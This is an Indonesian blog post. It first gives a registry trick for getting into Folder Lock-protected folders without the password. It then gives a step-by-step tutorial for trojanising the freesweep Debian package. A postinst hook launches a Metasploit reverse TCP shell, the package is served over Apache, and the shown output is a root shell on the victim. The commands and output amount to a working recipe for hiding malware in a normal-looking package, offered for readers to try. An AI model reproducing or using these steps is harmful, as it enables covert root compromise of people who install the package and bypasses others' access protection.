Kamis, 02 Desember 2010

cara buka folder lock yang lupa password nya

Cara buka Folderlock Yank udh tau nggak usah baca,,,,
Langsung to the POint aja dech: 1. Buka folder yg udah di proteksi ama Folder Lock dan coba masukin sembarang password
2. Biarin Folder Lock menunggu, buka regedit “hkey_local _machinesoftwarefolder lock, “bar code”
3. Ganti nama “bar code” menjadi “bar codet”
4. Sekarang kembali ke Folder Lock dan masukin password terserah apa aja
5. Lalu Klik “ok” dan mudah mudahan Folder Lock sudah bisa di Akses.
Mudah kan??








Trojan di Linuk

Dalam rangka untuk menunjukkan bahwa serangan sisi client dan trojan tidak eksklusif dengan dunia Windows, kita akan paket muatan Metasploit dengan paket deb Ubuntu untuk memberikan kita shell di Linux. Pertama-tama kita perlu men-download paket yang kita akan menginfeksi dan memindahkannya ke direktori kerja sementara. Dalam contoh kita, kita akan menggunakan ‘freesweep’ paket, versi berbasis teks Tambang Sweeper.
root@bt4:/pentest/exploits/framework3# apt-get --download-only install freesweep Reading package lists... Done Building dependency tree Reading state information... Done ...snip... root@bt4:/pentest/exploits/framework3# mkdir /tmp/evil root@bt4:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil root@bt4:/pentest/exploits/framework3# cd /tmp/evil/ root@bt4:/tmp/evil#
Selanjutnya, kita perlu untuk mengambil paket ke direktori kerja dan menciptakan sebuah direktori DEBIAN untuk mengadakan tambahan yang ditambahkan kami “fitur”.
root@v-bt4-pre:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work root@v-bt4-pre:/tmp/evil# mkdir work/DEBIAN
Dalam direktori ‘DEBIAN’, membuat file bernama ‘control’ yang berisi berikut:
root@bt4:/tmp/evil/work/DEBIAN# cat control Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
Kemudian buat file postinst dengan isi
root@bt4:/tmp/evil/work/DEBIAN# cat postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
Proses pembuatan tojans
root@bt4:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell/reverse_tcp Length: 50 Options: LHOST=192.168.1.101,LPORT=443
lhost diisi dengan ip kita yank konek jaringan kemudian port sesuai dengan keinginan kita Kita sekarang akan membuat post-installation script kami dieksekusi dan membangun paket baru kami. ‘Work.deb’ File yang dibangun akan diberi nama sehingga kami ingin mengubah itu ‘freesweep.deb’ dan menyalin paket ke direktori root.
root@bt4:/tmp/evil/work/DEBIAN# chmod 755 postinst root@bt4:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'. root@bt4:/tmp/evil# mv work.deb freesweep.deb root@bt4:/tmp/evil# cp freesweep.deb /var/www/
start apace server
root@bt4:/tmp/evil# /etc/init.d/apache2 start
jalankan metasploit untuk membuat file trojans
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler...
pada target linux masukkan koment
ubuntu@ubuntu:~$ wget http://192.168.1.101/freesweep.deb ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb
maka hasilnya pada listening
[*] Sending stage (36 bytes) [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129) ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6 inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49 errors:0 dropped:0 overruns:0 frame:0 TX packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB) Interrupt:17 Base address:0x1400 ...snip... hostname ubuntu id uid=0(root) gid=0(root) groups=0(root)
Selamat Mencoba
Sumber :